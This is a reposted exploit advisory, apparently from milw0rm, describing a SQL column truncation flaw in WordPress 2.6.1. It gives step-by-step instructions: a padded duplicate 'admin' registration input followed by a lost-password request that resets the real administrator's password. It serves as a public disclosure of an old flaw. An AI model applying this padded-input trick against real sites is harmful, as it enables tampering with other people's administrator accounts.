WordPress 2.6.1 SQL Column Truncation Vulnerability

番茄系统家园 · 2021-12-15 06:16:57

用wordpress的要注意了

WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)


found by irk4z[at]yahoo.pl

homepage: http://irk4z.wordpress.com/


this is not critical vuln [;


first, read this discovery:

http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/


in this hack we can remote change admin password, if registration enabled


greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends

  1. go to url: server.com/wp-login.php?action=register

  2. register as:

login: admin x

email: your email^ admin[55 space chars]x

now, we have duplicated 'admin' account in database

  1. go to url: server.com/wp-login.php?action=lostpassword

  2. write your email into field and submit this form

  3. check your email and go to reset confirmation link

  4. admin's password changed, but new password will be send to correct admin email ;/

milw0rm.com

免责声明: 凡标注转载/编译字样内容并非本站原创,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。如果你觉得本文好,欢迎推荐给朋友阅读;本文链接: https://m.nndssk.com/wlaq/172383xmhHHt.html
猜你喜欢
最新应用
热门应用